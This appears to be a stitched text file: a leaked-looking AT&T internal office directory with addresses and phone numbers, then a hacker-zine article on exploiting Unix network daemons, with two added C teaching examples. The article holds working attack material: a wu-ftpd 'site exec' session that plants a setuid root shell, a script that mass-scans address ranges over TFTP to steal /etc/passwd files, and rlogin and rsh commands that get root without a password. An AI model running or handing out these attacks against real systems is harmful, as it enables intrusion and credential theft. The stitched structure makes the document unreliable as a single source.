BETHESDA AMO 6410 ROCKLEDGE DR. BETHESDA MD 20817 301-493-2000
AT&T FED SYS 1100 WAYNE AVE SLVR SPGS MD 20910 301-495-7400
COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030 301-584-1234
FEDERAL SYS. MD 9160 GUILFORD RD COLUMBIA MD 21045 301-369-7700
COULUMBIA MD 9305D GERWIG LN.
COLUMBIA MD 21046 301-381-6150 AT&T 400 EAST PRATT ST. BALTIMORE MD 21202 301-576-5700 TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST. BALTIMORE MD 21230 301-385-0425 AT&T 136 COMMERCIAL ST., FLR 2 PORTLAND ME 04101 207-761-1400 AT&T 26957 NORTHWESTERN HWY. SOUTHFIELD MI 48034 313-353-6210 AT&T-NS 27777 FRANKLIN RD., SUITE 500 SOUTHFIELD MI 48034 313-355-7200 NILES MMC 2121 W. CHICAGO RD. NILES MI 49120 616-684-6400 AT&T 2861 CHARLEROIX, S.E. GRAND RPDS MI 49546 616-957-8200 AT&T 4480 W. ROUNDLAKE RD. ARDEN HLLS MN 55112 612-633-4803 MINNEAPOLIS SC 2230 COUNTY RD. H2 MOUNDSVIEW MN 55112 612-780-7750 AT&T 420 THIRD AVE. S., RM 670 MINEAPOLIS MN 55415 612-626-9300 AT&T MICROELECT. SALES W 82ND ST BLOOMINGTN MN 55431 612-885-4600 BALLWIN 1111 WOODS MILL RD. BALLWIN MO 63011 314-891-2000 ST.LOUIS-NS 701 MARKET ST. SUITE 900 ST. LOUIS MO 63101 314-891-5000 AT&T 400 S. WOODS MILL RD. CHSTRFLD MO 63107 314-275-1400 AT&T 424 S. WOODS MILL RD. CHSTRFLD MO 63107 314-469-2500 KANSAS CITY WORKS 777 N. BLUE PKWY LEESSUMMIT MO 64063 816-251-4000 KANSAS CITY AMO 1100 WALNUT ST. KANSASCITY MO 64141 816-654-4000 NC WORKS 3300 LEXINGTON RD. S.E. WIN-SALEM NC 27102 919-784-1110 REYNOLDA RD. (DDO) 2400 REYNOLDA RD. WIN-SALEM NC 27106 919-727-3100 BURLINGOTN NC 204 GRAHAM-HOPEDALE RD. BURLINGTON NC 27215 919-228-3000 GUILFORD CTR. I-85 MT HOPE CHURCH RD. MCLEANSVLE NC 27301 919-279-7000 NS 1701 PINECROFT RD. GREENSBORO NC 27407 919-855-2775 AT&T 7031 ALBERT PICK RD., SUITE 300 GREENSBORO NC 27409 919-668-1800 AT&T ENGR. 3330 W. FRIENDLY AVE. GREENSBORO NC 27410 919-379-5301 AT&T MICROELECT. SALES 5400 GLENWOOD RD. RALEIGH NC 27612 919-881-8023 AT&T 6701-A NORTHPARK BLVD. CHARLOTTE NC 28216 704-597-3050 AT&T 2 CENTRAL PARK PLAZA OMAHA NE 68102 402-595-5001 OMAHA AMO 222 S. 15th.ST, SUITE 200 S. 
OMAHA NE 68124 402-595-5001 OMAHA WORKS 120 & 1 ST OMAHA NE 68137 402-691-3000 AT&T 10843 OLD MILL RD OMAHA NE 68154 402-334-6000 AT&T 4 BEDFORD FARMS BEDFORD NH 03102 603-623-6100 SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON NH 03801 603-436-6100 PARSIPPANY 260 CHERRY HILL RD. PARSIPPANY NJ 07054 201-299-3000 PARSIPPANY 4 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-428-7700 PARSIPPANY CP 5 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-581-3000 AT&T 99 JEFFERSON RD. WOODHOLLOW III PARSIPPANY NJ 07054 201-581-5600 AT&T 4 CAMPUS DRIVE PARSIPPANY NJ 07054 201-829-1000 AT&T 700 LANIDEX PLAZA PARSIPPANY NJ 07054 201-884-7000 AT&T 1515 RTE 10 PARSIPPANY NJ 07054 201-993-4200 LIBERTY CORNER 184 LIBERTY CORNER RD WARREN NJ 07060 201-580-4000 AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD. WARREN NJ 07060 201-756-1527 CLARK SHOPS 100 TERMINAL AVE. CLARK NJ 07066 201-396-4000 SHORT HILLS BELL LABS 101 JFK PKWY SHORTHILLS NJ 07078 201-564-2000 AT&T 5000 HADLEY RD SO.PLNFLD NJ 07080 201-668-3200 QUALITY MGMT ENGIN. 650 LIBERTY AVE. UNION NJ 07083 201-851-3333 AT&T 1480 ROUTE 9 N. WOODBRIDGE NJ 07095 201-750-3100 TWO GATEWAY CTR. NEWARK NJ 07102 201-468-6000 FREEHOLD AT&T JUNIPER PLAZA RT.9 FREEHOLD NJ 07728 201-577-5000 AT&T-BL CRAWFORD HILL KEYPORT RD. HOLMDEL NJ 07733 201-888-7000 AT&T-BL CRAWFORDS CORNER RD HOLDMEL NJ 07733 201-957-2000 AT&T 307 MIDDLETOWN-LINCROFT RD. LINCROFT NJ 07738 201-576-4000 RED HILL-BL 480 RED HILL RD MIDDLETOWN NJ 07748 201-949-3000 AT&T 200 LAUREL AVE MIDDLETOWN NJ 07748 201-957-2000 W. LONG BRANCH 185 MONMOUTH PKWY W.LG.BRNCH NJ 07764 201-870-7000 SUMMIT 190 RIVER RD. SUMMIT NJ 07901 201-522-6555 AT&T 233 MT. AIRY RD BSK RDGE NJ 07920 201-204-4000 AT&T 188 MT. AIRY RD BSK RDGE NJ 07920 201-221-2000 BASKING RIDGE 295 NO. MAPLE AVE. BSK RDGE NJ 07920 201-221-2000 AT&T 131 MORRISTOWN RD BSK RDGE NJ 07920 201-953-3900 AT&T RMC 222 MT. AIRY RD BSK RDGE NJ 07920 201-953-5300 AT&T INTNAT'L MT. KEMBLE AVE BSK RDGE NJ 07920 201-953-7000 AT&T-COMM. TR. 202-206N. 
BEDMINSTER NJ 07921 201-234-4000 BERKELEY HEIGHTS 1 OAK WAY BRKLY HGTS NJ 07922 201-771-2000 BERKELEY HEIGHTS 2 OAK WAY BRKLY HGTS NJ 07922 201-771-2000 BERNARDSVILLE 4 ESSEX AVE BERNARDSVL NJ 07924 201-204-2701 AT&T-BL NORTH RD CHESTER NJ 07930 201-879-3400 MT. KEMBLE PLAZA 340 RTE. 202 S. MORRISTOWN NJ 07960 201-326-2000 AT&T CAPITAL CORP. 44 WHIPPANY RD. MORRISTOWN NJ 07960 201-397-3000 MORRISTOWN AMO 111 MADISON AVE. MORRISTOWN NJ 07960 201-631-3700 AT&T 412 MOUNT KEMBLE AVE. MORRISTOWN NJ 07960 201-644-6000 AT&T 60 COLUMBIA TRNPK MORRISTOWN NJ 07960 201-829-7200 MORRIS BELL LABS 25 LINDSLEY DR. MORRISTOWN NJ 07960 201-898-1000 AT&T 1 SPEEDWELL AVE. MORRISTOWN NJ 07960 201-898-2000 AT&T 1776 ON THE GREEN MORRISTOWN NJ 07960 201-898-6000 AT&T 100 SOUTHGATE PARKWAY MORRISTOWN NJ 07960 201-898-8000 SOUTH GATE 475 SOUTH ST. MORRISTOWN NJ 07962 201-606-2000 MURRAY HILL 600 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-582-3000 AT&T-T 40 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-665-7000 WHIPPANY BELL LABS WHIPPANY RD WHIPPANY NJ 07981 201-386-3000 PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY PENNSAUKEN NJ 08110 609-488-9020 HOPEWELL-ERC CARTER RD. HPWL TNSHP NJ 08525 609-639-1234 HOPEWELL-CEC CARTER RD. HPWL TNSHP NJ 08525 609-639-4500 AT&T 29-C EMMONS DRIVE PRINCETON NJ 08540 609-987-3000 LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK LRNCVLLE NJ 08648 609-896-4000 AT&T COMM (IMS) 1300 WHITE HOUSE TRENTON NJ 08690 609-581-1000 AT&T 745 RT 202/206N BRIDGEWATR NJ 08807 201-231-6000 AT&T 95 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-5000 AT&T MARKTG CTR 55 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-6000 AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS ISELIN NJ 08830 201-855-8000 AT&T 80 NORTHFIELD AVE. EDISON NJ 08837 201-225-8700 AT&T 20 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-1028 AT&T 30 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-2000 AT&T 180 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-6000 AT&T CORP ED. 140 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-7000 AT&T 371 HOES LN. 
PISCATAWAY NJ 08854 201-463-2200 AT&T 242 OLD NEW BRUNSWICK RD PISCATAWAY NJ 08854 201-562-6900 AT&T 100 ATRIUM WAY SOMERSET NJ 08873 201-560-1300 AT&T PIXEL MACHINES 1 EXEC.DR. SOMERSET NJ 08873 201-563-2200 HOLMDEL-BL CRAWFORDS CORNER RD HOLMDEL NJ 07733 201-949-3000 AT&T 1001 MENAUL BLVD. N.E. B345 ALBUQURQUE NM 87107 505-761-6300 SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E. ALBUQURQUE NM 87123 505-844-5678 AT&T 220 EDISON WAY RENO NV 89502 702-239-7015 AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS NEW YORK NY 10013 212-219-6396 AT&T-NYC 22 CORTLANDT ST. NEW YORK NY 10017 212-393-9800 550 MADISON AVE. NEW YORK NY 10022 212-605-5500 NS ONE PENN PLAZA SUITE 5420 NEW YORK NY 10119 212-714-5900 AT&T 2 MANHATTANVILLE RD. PURCHASE NY 10577 914-251-0700 SUFFERN MMC 22 HEMION RD. SUFFERN NY 10901 914-577-6600 AT&T 520 BROAD HOLLOW RD. MELVILLE NY 11747 516-420-3000 ALBANY 11 26 AVIATION RD. ALBANY NY 12205 518-489-4615 AT&T 16 CORPORATE WOODS BLVD. ALBANY NY 12211 518-447-6900 AT&T 2 JEFFERSON PLAZA, FLR 2 POUGHKEPSE NY 12601 914-485-7744 AT&T MARKETING 6597 KINNE RD SYRACUSE NY 13214 315-445-3800 AT&T 300 PEARL ST. OLYMPIA TOWERS BUFFALO NY 14202 716-849-6000 BUFFALO INSTALL. 25 JOHN GLENN DR. AMHERST NY 14228 716-691-2711 AT&T 1 MARINE MIDLAND PLZ. ROCHESTER NY 14604 716-777-4400 CET 5151 BLAZER MEM. PKWY DUBLIN OH 43017 614-764-5454 COLUMBUS WORKS 6200 E. BROAD ST. COLUMBUS OH 43213 614-860-2000 AT&T ONE SEAGATE, SUITE 750 TOLEDO OH 43604 419-245-3700 AT&T-NS 55 ERIEVIEW PLAZA 4TH FL. CLEVELAND OH 44114 216-664-6500 ADP 7007 E. PLEASANT VALLEY INDEPNDNCE OH 44131 216-447-1980 NAT'L ACCOUNT 1 FIRST NAT'L PLAZA DAYTON OH 44502 513-449-7800 AT&T 7725 W. RENO AVE. OK. CITY OK 73126 405-491-3000 AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE. PORTLAND OR 97201 503-295-5000 AT&T MICROELECT 1220 SW GREENBURGH RD PORTLAND OR 97223 503-244-3883 AT&T COMMERCE CT. 4 STATION SQ. SUITE 770 PITTSBURGH PA 15219 412-338-4800 AT&T 4 GATEWAY CTR. 
SUITE 500 PITTSBURGH PA 15222 412-392-8200 AT&T 470 STREETS RUN RD. PITTSBURGH PA 15236 412-882-1845 HARRISBURG 2080 LINGLESTOWN RD. HARRISBURG PA 17110 717-540-7251 ALLENTOWN-BETHLEHEM 2255 AVE. A BETHLEHEM PA 18018 215-861-2700 AT&T-BL STC RT 222 BREINIGSVL PA 18103 215-391-2000 AT&T MICROELECT. 961 MARCON BLVD. ALLENTOWN PA 18103 215-266-2900 ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD. ALLENTOWN PA 18103 215-770-2200 AT&T 1 IMPERIAL WAY 2ND FL. ALLENTOWN PA 18195 215-398-5800 AT&T 3 BALA PLAZA WEST BLDG. BALA CYNWD PA 19004 215-581-2400 AT&T 514 KAISER DR. FOLCROFT PA 19032 215-724-5250 AT&T 1800 JFK BLVD., SUITE 1300 PHILADELPH PA 19103 215-972-1300 KING OF PRUSSIA 601 ALLENDALE RD. KING OF PR PA 19406 215-768-2600 READING WORKS 2525 N. 12TH ST. READING PA 19604 215-939-7011 AT&T NASSAU RECYCLE 4201 W. COLUMBIA CASEY SC 29033 803-796-4720 AT&T 1201 MAIN ST. 22ND FL. COLUMBIA SC 29201 803-733-3800 AT&T 111 WESTWOOD PL. 3RD FL. BRENTWOOD TN 37027 615-377-4000 AT&T MICROELECT. 195 POLK AVE. NASHVILLE TN 37211 615-749-8222 AT&T REPAIR CTR 653 MAINSTREAM DR. NASHVILLE TN 37228 615-242-1950 NASHVILLE MSL 566 MAINSTREAM DR. NASHVILLE TN 37228 615-256-4111 AT&T 9041 EXECUTIVE PARK KNOXVILLE TN 37923 615-690-3400 AT&T-NS SALES 909 E.LAS COLINAS BLVD IRVING TX 75039 214-401-4700 DALLAS WORKS 3000 SKYLINE DRIVE MESQUITE TX 75149 214-284-2000 AT&T-NS 1201 MAIN ST. SUITE 2555 DALLAS TX 75202 214-745-4790 AT&T 5525 LBJ FREEWAY DALLAS TX 75240 214-308-2000 AT&T 2501 PARKVIEW DR., SUITE 200 FT.WORTH TX 76102 817-870-4400 AT&T-NS 2900 N. LOOP WEST HOUSTON TX 77092 713-956-4400 AT&T CITYVIEW 10999 IH 10 W SAN ANTON TX 78230 512-691-5700 AT&T 5444 S. STAPLES CORPUS CHR TX 78411 512-994-4400 AT&T 8911 CAP. OF TEX HGHWY AUSTIN TX 78759 512-343-3000 AT&T 415 WEST 8TH ST. SUITE 307 AMARILLO TX 79101 806-374-9435 AT&T-BMG 3000 N. GARFIELD SUITE 180 MIDLAND TX 79705 915-687-8700 AT&T-NS 10521 ROSEHAVEN ST. 
And remember... All directory information is classified AT&T Proprietary and, as such, should be safeguarded as outlined in GEI 2.2. Responsibility for security is passed on to each employee receiving the directory.

=========

Playing with the Internet Daemons
by Voyager [TNO]

Internet hosts communicate with each other using either TCP (Transmission Control Protocol) or UDP (User Datagram Protocol) on top of IP (Internet Protocol). Other protocols are used on top of IP, but TCP and UDP are the ones that are of interest to us. On a Unix system, the file /etc/protocols will list the available protocols on your machine.

On the Session Layer (OSI model) or the Internet Layer (DOD Protocol Model) data is moved between hosts by using ports. Each data communication will have a source port number and a destination port number.
Port numbers can be divided into two types, well-known ports and dynamically allocated ports. Under Unix, well-known ports are defined in the file /etc/services. In addition, RFC (Request For Comments) 1700 "Assigned Numbers" provides a complete listing of all well-known ports. Dynamically allocated port numbers are assigned as needed by the system.

Unix provides the ability to connect programs called daemons to well-known ports. The remote computer will connect to the well-known port on the host computer, and be connected to the daemon program. Daemon programs are traditionally started by inetd (the Internet Daemon). Daemon programs to be executed are defined in the inetd configuration file, /etc/inetd.conf. Most of these daemons run as a privileged user, often as root. Many of these programs have vulnerabilities which can be exploited to gain access to remote systems.

The daemons we are interested in are:

Service        Port Number   Description
~~~~~~~~~~~~~  ~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ftp            21            File Transfer [Control]
smtp           25            Simple Mail Transfer Protocol
tftp           69            Trivial File Transfer Protocol
finger         79            Finger
www-http       80            World Wide Web HTTP
sunrpc         111           SUN Remote Procedure Call
fln-spx        221           Berkeley rlogind with SPX auth
rsh-spx        222           Berkeley rshd with SPX auth
netinfo        716-719       NetInfo
ibm-res        1405          IBM Remote Execution Starter
nfs            2049          Network File System
x11            6000-6063     X Window System
rcp/rshd                     Remote Copy/Remote Shell Daemon
nis                          Network Information Services

The next part of this article will focus on specific daemons and their known vulnerabilities. Each vulnerability is given a brief explanation here. For the more complicated exploits, which are beyond the scope of a concise article, more research will be required on the part of the reader.

--> ftp 21 File Transfer [Control]

FTP is the File Transfer Protocol. FTP requests are answered by the FTP daemon, ftpd.
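Before the daemon-by-daemon walk-through, here is an added example (not from the article) of the check an administrator would run against the inetd mechanism just described: it parses an /etc/inetd.conf, marks the active entries that belong to the daemons in the table above and the ones inetd would start as root, and treats commented-out lines as disabled. The config text, the service list and every name in them are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed audit of an /etc/inetd.conf (added example, not from the article).
 * Fields per line: service socket-type protocol wait/nowait user server [args];
 * a leading '#' disables the entry. */

#define MAX_ENTRIES 64
#define NAME_LEN 32

struct inetd_entry {
    char service[NAME_LEN];
    char user[NAME_LEN];
    int  covered;   /* one of the daemons this article walks through */
    int  as_root;   /* inetd would start the server as root */
};

/* inetd names for the daemons in the table above; shell/login/exec are the
 * inetd.conf names for rshd, rlogind and rexecd. Constructed list. */
static const char *covered_services[] = {
    "ftp", "smtp", "tftp", "finger", "www-http", "sunrpc",
    "shell", "login", "exec", "netinfo", "rexd", NULL
};

static int is_covered(const char *svc) {
    for (int i = 0; covered_services[i]; i++)
        if (strcmp(svc, covered_services[i]) == 0) return 1;
    return 0;
}

/* Parse one line: returns 1 and fills *e for an active service entry, 0 for
 * blank lines, comments (that is, disabled services) and malformed lines. */
int parse_inetd_line(const char *line, struct inetd_entry *e) {
    char buf[512], *fields[6], *tok;
    int n = 0;
    strncpy(buf, line, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (tok = strtok(buf, " \t\r\n"); tok && n < 6; tok = strtok(NULL, " \t\r\n"))
        fields[n++] = tok;
    if (n < 6 || fields[0][0] == '#')
        return 0;
    strncpy(e->service, fields[0], NAME_LEN - 1);
    e->service[NAME_LEN - 1] = '\0';
    strncpy(e->user, fields[4], NAME_LEN - 1);   /* user, user.group or user:group */
    e->user[NAME_LEN - 1] = '\0';
    e->user[strcspn(e->user, ".:")] = '\0';
    e->covered = is_covered(e->service);
    e->as_root = strcmp(e->user, "root") == 0;
    return 1;
}

/* Walk a whole config text; returns the number of active entries stored. */
int audit_inetd_conf(const char *conf, struct inetd_entry *out, int max) {
    int count = 0;
    while (*conf && count < max) {
        const char *nl = strchr(conf, '\n');
        size_t len = nl ? (size_t)(nl - conf) : strlen(conf);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, conf, len);
        line[len] = '\0';
        if (parse_inetd_line(line, &out[count])) count++;
        conf = nl ? nl + 1 : conf + len;
    }
    return count;
}

/* What a hardening checklist would report: how many active entries run as
 * root (want_root=1) or belong to the daemons covered above (want_root=0). */
int count_entries(const char *conf, int want_root) {
    struct inetd_entry e[MAX_ENTRIES];
    int n = audit_inetd_conf(conf, e, MAX_ENTRIES), hits = 0;
    for (int i = 0; i < n; i++) hits += want_root ? e[i].as_root : e[i].covered;
    return hits;
}

/* Constructed sample in SunOS 4 style; tftp is commented out, i.e. disabled. */
const char *SAMPLE_CONF =
    "# inetd.conf (constructed sample)\n"
    "ftp     stream tcp nowait root       /usr/etc/in.ftpd     in.ftpd\n"
    "telnet  stream tcp nowait root       /usr/etc/in.telnetd  in.telnetd\n"
    "#tftp   dgram  udp wait   root       /usr/etc/in.tftpd    in.tftpd -s /tftpboot\n"
    "finger  stream tcp nowait nobody     /usr/etc/in.fingerd  in.fingerd\n"
    "login   stream tcp nowait root.wheel /usr/etc/in.rlogind  in.rlogind\n"
    "shell   stream tcp nowait root       /usr/etc/in.rshd     in.rshd\n";

int main(void) {
    struct inetd_entry e[MAX_ENTRIES];
    int n = audit_inetd_conf(SAMPLE_CONF, e, MAX_ENTRIES);
    for (int i = 0; i < n; i++)
        printf("%-8s user=%-7s%s%s\n", e[i].service, e[i].user,
               e[i].covered ? " [discussed above]" : "",
               e[i].as_root ? " [runs as root]" : "");
    return 0;
}
```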
wuarchive's ftpd versions below 2.2 have a vulnerability where you can execute any binary you can see with the 'site exec' command by calling it with a relative pathname with "../" at the beginning. Here is a sample exploit:

Login to the system via ftp:

220 uswest.com FTP server (Version wu-2.1(1) ready.
Name (uswest.com:waltman): waltman
331 Password required for waltman.
Password: jim
230 User waltman logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec cp /bin/sh /tmp/.tno"
200-cp /bin/sh /tmp/tno
ftp> quote "site exec chmod 6755 /tmp/.tno"
200-chmod 6755 /tmp/tno
ftp> quit
221 Goodbye.

--> smtp 25 Simple Mail Transfer Protocol

Mail attacks are one of the oldest known methods of attacking Internet hosts. The most common mail daemon, and least secure, is sendmail. Other mail daemons include smail, MMDF, and IDA sendmail. Sendmail has had too many vulnerabilities to list them all. There is an entire FAQ written specifically on sendmail vulnerabilities, therefore we will not cover them heavily here.

One well known vulnerability, useful only for historical purposes, is "Wizard Mode." In Wizard mode you could request a shell via port 25 (the SMTP port). No modern system will be vulnerable to this attack. To exploit this vulnerability, you telnetted to port 25, typed WIZ to enter Wizard mode, and entered the password. The problem related to the way the encrypted password was stored. There was a bug that caused the system to believe that no password was as good as the real password. To quote Steven Bellovin:

The intended behavior of wizard mode was that if you supplied the right password, some other non-standard SMTP commands were enabled, notably one to give you a shell. The hashed password -- one-way encrypted exactly as per /etc/passwd -- was stored in the sendmail configuration file. But there was this bug; to explain it, I need to discuss some arcana relating to sendmail and the C compiler.
In order to save the expense of reading and parsing the configuration file each time, sendmail has what's known as a ``frozen configuration file''. The concept is fine; the implementation isn't. To freeze the configuration file, sendmail just wrote out to disk the entire dynamic memory area (used by malloc) and the `bss' area -- the area that took up no space in the executable file, but was initialized to all zeros by the UNIX kernel when the program was executed. The bss area held all variables that were not given explicit initial values by the C source. Naturally, when delivering mail, sendmail just read these whole chunks back in, in two giant reads. It was therefore necessary to store all configuration file information in the bss or malloc areas, which demanded a fair amount of care in coding.

The wizard mode password was stored in malloc'ed memory, so it was frozen properly. But the pointer to it was explicitly set to NULL in the source:

char *wiz = NULL;

That meant that it was in the initialized data area, *not* the bss. And it was therefore *not* saved with the frozen configuration. So -- when the configuration file is parsed and frozen, the password is read, and written out. The next time sendmail is run, though, the pointer will be reset to NULL. (The password is present, of course, but there's no way to find it.) And the code stupidly believed in the concept of no password for the back door.

One more point is worth noting -- during testing, sendmail did the right thing with wizard mode. That is, it did check the password -- because if you didn't happen to do the wizard mode test with a frozen configuration file -- and most testing would not be done that way, since you have to refreeze after each compilation -- the pointer would be correct.

--> tftp 69 Trivial File Transfer Protocol

tftp is the Trivial File Transfer Protocol. tftp is most often used to attempt to grab password files from remote systems.
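To make Bellovin's point about the wizard-mode password concrete before the tftp material continues, here is an added example (constructed for this article, not sendmail's code): a toy freeze/thaw cycle in which one struct without an initialiser stands in for the bss and heap areas, the explicitly NULL-initialised pointer wiz stays in .data and is lost, and the original fail-open check is shown next to a fail-closed one. toy_hash is a constructed stand-in for crypt().

```c
#include <stdio.h>
#include <string.h>

/* Toy model of the frozen-configuration bug Bellovin describes (added example,
 * not sendmail's code). The "bss" area is modelled as one struct without an
 * initialiser; the wizard pointer keeps its explicit NULL initialiser, which is
 * what puts it in .data, where a freeze of bss + heap never sees it. */

#define HEAP_SIZE 64

struct bss_area {
    char heap[HEAP_SIZE];      /* stands in for the malloc arena */
    int  config_parsed;
};
static struct bss_area bss;            /* no initialiser: .bss, saved by freeze */
static char *wiz = NULL;               /* explicit NULL: .data, NOT saved */
static struct bss_area frozen_image;   /* the "frozen configuration file" */

/* Stand-in for crypt(): djb2 rendered as hex. Constructed, not a real hash. */
static void toy_hash(const char *s, char *out, size_t outlen) {
    unsigned long h = 5381;
    for (; *s; s++) h = h * 33 + (unsigned char)*s;
    snprintf(out, outlen, "%lx", h);
}

/* Parsing the config: the hashed wizard password goes into the heap, and the
 * pointer to it into wiz. */
void parse_config(const char *wizard_password) {
    toy_hash(wizard_password, bss.heap, HEAP_SIZE);
    wiz = bss.heap;
    bss.config_parsed = 1;
}

/* Freeze: the bss and heap areas are written out in one piece. */
void freeze_config(void) { frozen_image = bss; }

/* Thaw in a fresh process: the kernel zero-fills .bss and reloads .data from
 * the executable (so wiz is NULL again), then the frozen image is read back. */
void thaw_config(void) {
    memset(&bss, 0, sizeof bss);
    wiz = NULL;
    bss = frozen_image;
}

/* The hash came back from disk, but nothing points at it any more. */
int password_orphaned(void) {
    return bss.config_parsed && bss.heap[0] != '\0' && wiz == NULL;
}

static int hash_matches(const char *attempt) {
    char h[HEAP_SIZE];
    toy_hash(attempt, h, sizeof h);
    return strcmp(h, wiz) == 0;
}

/* The original logic: no stored password is treated as no password needed. */
int wiz_check_buggy(const char *attempt) {
    if (wiz == NULL) return 1;       /* fails open */
    return hash_matches(attempt);
}

/* Fail-closed variant: without a configured hash, wizard mode stays off. */
int wiz_check_fixed(const char *attempt) {
    if (wiz == NULL) return 0;
    return hash_matches(attempt);
}

/* Parse afresh (no freeze) and run the fixed check: the normal, working path. */
int fresh_fixed_check(const char *password, const char *attempt) {
    parse_config(password);
    return wiz_check_fixed(attempt);
}

/* Whole scenario: 1 if a wrong password is rejected on a fresh parse but
 * accepted by the buggy check after freeze/thaw, while the fixed check rejects. */
int demo_freeze_thaw(const char *password, const char *wrong) {
    parse_config(password);
    int fresh_ok = wiz_check_buggy(password) && !wiz_check_buggy(wrong);
    freeze_config();
    thaw_config();
    return fresh_ok && password_orphaned()
        && wiz_check_buggy(wrong) && !wiz_check_fixed(wrong);
}

int main(void) {
    printf("back door opens after thaw: %d\n", demo_freeze_thaw("s3cret", "guess"));
    printf("fixed check accepts the real password after thaw: %d\n",
           wiz_check_fixed("s3cret"));   /* 0: the hash is present but unreachable */
    return 0;
}
```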
tftp attacks are so simple and repetitive that scripts are written to automate the process of attacking entire domains. Here is one such script:

#!/bin/sh
########################################################################
# TFTP snagger by Yo
# It snags /etc/passwd files from all hosts with open 69 (tftp) port.
# scans all hosts from XX.XX.0.0 - XX.XX.255.255
# you can run it in the background in following way:
#     snag [hostname] > /dev/null &
# [hostname] might be used IP
# (with -ip option) as well as FQDN
# Last Updated 10/20/92
#
# Highly modified by ThePublic on 10/21/92
########################################################################
case $1 in
'')
    echo " Usage: $0 [hostname]               to run in the foreground "
    echo "        $0 [hostname] > /dev/null & to run in the background "
    echo " The [hostname] can be specialized in fully qualified domain name "
    echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
    echo " as well as IP with -ip option. "
    exit 1 ;;
-ip)
    if [ $2x = x ]; then
        echo " Usage: $0 $1 the IP "
        exit 1
    else
        x=`echo $2 | cut -d. -f1`
        xx=`echo $2 | cut -d. -f2`
        xxx=`echo $2 | cut -d. -f3`
        xxxx=`echo $2 | cut -d. -f4`
        #                ^ field delimiter is '.' -- get field 1/2/3/4
    fi;;
*)
    if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then   # -x is for SunOs
        echo sorry dude, no nslookup server .. try it with -ip option.
        exit 1
    fi
    x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
    #                                          ^ 7 chars   ^ last line
    if [ "$x1" = '' ]; then
        echo " There is no such domain. Nothing to scan. Exit. "
        exit 1
    fi
    x=`echo $x1 | cut -d. -f1`    # get the first set of #, ##, or ###
    xx=`echo $x1 | cut -d. -f2`   # get the second set
    xxx=0                         # ignore the rest, if any
    xxxx=0 ;;
esac
if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
    echo There is no such domain. Nothing to scan.
    exit 1
fi
while [ $x -ne 255 ]; do
  while [ $xx -ne 255 ]; do
    while [ $xxx -ne 255 ]; do
      while [ $xxxx -ne 255 ]; do
        target=$x.$xx.$xxx.$xxxx
        trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1" 2
        tftp << EOF
c $target
mode ascii
trace
get /etc/passwd passwd.$target
quit
EOF
        if [ ! -s passwd.$target ] ; then
          rm -rf passwd.$target
          echo `date` $target has rejected an attempt >> .info
        else
          mv passwd.$target .good.$target
          echo `date` $target is taken, all data is stored in .good.$target file >> .info
        fi
        xxxx=`expr $xxxx + 1 `
      done
      xxxx=0
      xxx=`expr $xxx + 1 `
    done
    xxx=0
    xx=`expr $xx + 1 `
  done
  xx=0
  x=`expr $x + 1 `
done

--> finger 79 Finger

The finger command displays information about another user, such as login name, full name, terminal name, idle time, login time, and location if known. finger requests are answered by the fingerd daemon. Robert Tappan Morris's Internet Worm used the finger daemon. The finger daemon allowed up to 512 bytes from the remote machine as part of the finger request. fingerd, however, suffered from a buffer overflow bug caused by a lack of proper bounds checking. Anything over 512 got interpreted by the machine being fingered as an instruction to be executed locally, with whatever privileges the finger daemon had.

--> www-http 80 World Wide Web HTTP

HTML (HyperText Markup Language) allows a web page user to execute programs on the host system. If the web page designer allows the web page user to enter arguments to the commands, the system is vulnerable to the usual problems associated with system() type calls. In addition, there is a vulnerability that under some circumstances will give you an X-Term using the UID that the WWW server is running under.

--> sunrpc 111 SUN Remote Procedure Call

Sun RPC (Remote Procedure Call) allows users to execute procedures on remote hosts. RPC has suffered from a lack of secure authentication.
To exploit RPC vulnerabilities, you should have a program called "ont" which is not terribly difficult to find.

--> login 513 Remote login

Some versions of AIX and Linux suffer from a bug in the way that rlogind reads arguments. To exploit this vulnerability, issue this command from a remote system:

rlogin host -l -froot

Where host is the name of the target machine and the name after -f is the username you would like to rlogin as (usually root). If this bug exists on the host's system, you will be logged in without being asked for a password.

--> rsh-spx 222 Berkeley rshd with SPX auth

Some versions of Dynix and Irix have a bug in rshd that allows you to run commands as root. To exploit this vulnerability, issue this command from the remote system:

rsh host -l "" /bin/sh

--> netinfo 716-719 NetInfo

NeXT has implemented a protocol known as NetInfo so that one NeXT machine can query another NeXT machine for information. A NetInfo server will by default allow unrestricted access to system databases. This can be fixed by the System Administrator. One of the pieces of information netinfo will give up is the password file.

--> ibm-res 1405 IBM Remote Execution Starter

